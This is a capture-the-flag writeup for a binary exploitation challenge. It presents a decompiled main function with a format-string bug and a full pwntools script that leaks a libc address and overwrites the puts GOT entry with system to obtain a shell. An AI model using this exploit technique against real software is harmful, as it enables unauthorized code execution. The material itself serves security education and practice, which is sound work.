
2025-4

Challenge information

  • CTF:

  • Challenge: Faulty Announcer

  • Solves: 82

  • Description: ~ The speaker has its own ideas.

  • Time-wasting to solve: 10 min

Writeup

Obviously a format-string bug (fsb): the user-supplied buffer is handed to `printf` as the format argument itself.

// Decompiler (HLIL-style) listing of main. The hex column on the left holds the
// original instruction addresses; it is not part of the source.
0040121b int32_t main(int32_t argc, char** argv, char** envp)
0040122a     void* fsbase
0040122a     int64_t rax = *(fsbase + 0x28)          // saved stack canary (fs:0x28); compared again before return
00401239     init()
00401248     puts(str: "What is your name?")
0040126b     char var_a2                              // "name" buffer: fgets(n: 0xa) stores at most 9 chars plus NUL
0040126b
0040126b     if (fgets(buf: &var_a2, n: 0xa, fp: stdin) != 0)
00401281         puts(str: "Speak loud what do you want")
004012a4         char var_98[0x88]
004012a4
004012a4         if (fgets(buf: &var_98, n: 0x80, fp: stdin) != 0)
004012bf             printf(format: &var_98)          // BUG: attacker-controlled buffer is the format string; printf("%s", var_98) or puts(var_98) is the fix
004012ce             puts(str: "I SAID SPEAK LOUD!")
004012ce
004012f1             if (fgets(buf: &var_98, n: 0x80, fp: stdin) != 0)
00401309                 printf(format: &var_98)      // same defect a second time: the input is read twice, so the bug is reachable twice per run
00401318                 puts(str: "so you said")
00401327                 puts(str: &var_a2)           // echoes the name; this puts call is the one whose GOT entry the writeup targets
00401327
00401335     *(fsbase + 0x28)
00401335
0040133e     if (rax == *(fsbase + 0x28))            // canary intact -> normal return
00401346         return 0
00401346
00401340     __stack_chk_fail()                      // canary corrupted -> abort
00401340     noreturn
  1. leak libc address

  2. GOT overwrite

from pwn import *
from icecream import ic  # third-party pretty-printer, used only for the debug output below
import sys

# Target binary (patched to load the bundled libc/ld), the matching libc, and the loader.
e = ELF("chall_patched",checksec=False)
libc = ELF("libc.so.6",checksec=False)
ld = ELF("ld-linux-x86-64.so.2",checksec=False)

# Connection string, parsed into HOST/PORT below. Only the "nc host port" form is
# exercised here. Both tests are substring checks, so a URL containing "nc" would
# match both branches (the later one wins).
nc = "nc 127.0.0.1 9999"
if "nc" in nc:
    HOST = nc.split(" ")[1]
    PORT = int(nc.split(" ")[2])
if "http" in nc:
    from urllib.parse import urlparse
    HOST = urlparse(nc).hostname
    PORT = urlparse(nc).port

# dbg != 0 attaches gdb to the local process.
# NOTE(review): the line breaks inside g_script were lost when this page was
# flattened; the commented-out `set`, the breakpoint at main's `return 0`
# (0x401346 in the listing above) and `c` presumably each sat on their own line.
dbg = 1
g_script = """ #set max-visualize-chunk-size 0x300 b *0x00401346 c """
context.binary = e

# Remote when any CLI argument is given, otherwise a local process.
# NOTE(review): the nesting of the gdb.attach line was inferred from the flattened page.
if len(sys.argv) > 1:
    io = remote(host=HOST,port=PORT)
else:
    io = e.process()
    if dbg: gdb.attach(io,g_script)

# Short aliases over the pwntools tube API.
s = lambda b: io.send(b)
sa = lambda a,b: io.sendafter(a,b)
sl = lambda b: io.sendline(b)
sln = lambda b: io.sendline(str(b).encode())
sla = lambda a,b: io.sendlineafter(a,b)
r = lambda : io.recv()
ru = lambda b:io.recvuntil(b)
rl = lambda : io.recvline()
pu32= lambda b : u32(b.ljust(4,b"\0"))
pu64= lambda b : u64(b.ljust(8,b"\0"))
hlog= lambda i : print(f"[*]{hex(i)}")
fsp = lambda b : f"%{b}$p".encode()
shell = lambda : io.interactive()

# Payload accumulator shared by rst() and pay().
payload: bytes = b""
# Clear the accumulator and log it.
def rst():global payload;payload = b"";log.info("***PAYLOAD RESET***")
# Append every positional argument: bytes as-is, str encoded, anything else packed
# with p64. (isinstance() would be the idiomatic type test here; kwargs are ignored.)
def pay(*args, **kwargs): global payload; payload += b"".join([a if type(a) == bytes else (a.encode() if type(a) == str else p64(a)) for a in args])

# First fgets: the "name" (var_a2 in the listing, at most 9 bytes). main later echoes
# it with puts(&var_a2), which is the call whose GOT entry is replaced below.
sl(b"/bin/sh")
r()
# Second fgets: the binary uses this buffer as printf's format string, so a bare "%p"
# prints a stack value. The script treats it as a libc pointer (see the next line).
sl(b"%p")
rl()
leak = int(rl().strip(),16)
# The subtraction is that pointer's offset inside libc, taken from one observed run
# (0x778a67203963 minus the base 0x778a67000000); it is specific to this libc build.
libc.address = leak - (0x778a67203963 - 0x0000778a67000000)
ic(hex(libc.address))
# Third fgets reaches the same printf again. fmtstr_payload builds the writes that
# replace puts' GOT entry with system's address; 8 is the argument position at which
# printf sees var_98's contents (the author's value, not derived on this page).
# A writable GOT is presumably what makes this possible; full RELRO would prevent it.
pay(
    fmtstr_payload(8,{
        e.got["puts"]: libc.symbols["system"],
    })
)
ic(len(payload))
ic(payload)
sl(payload)
r()
shell()
Last modified: 04 November 2025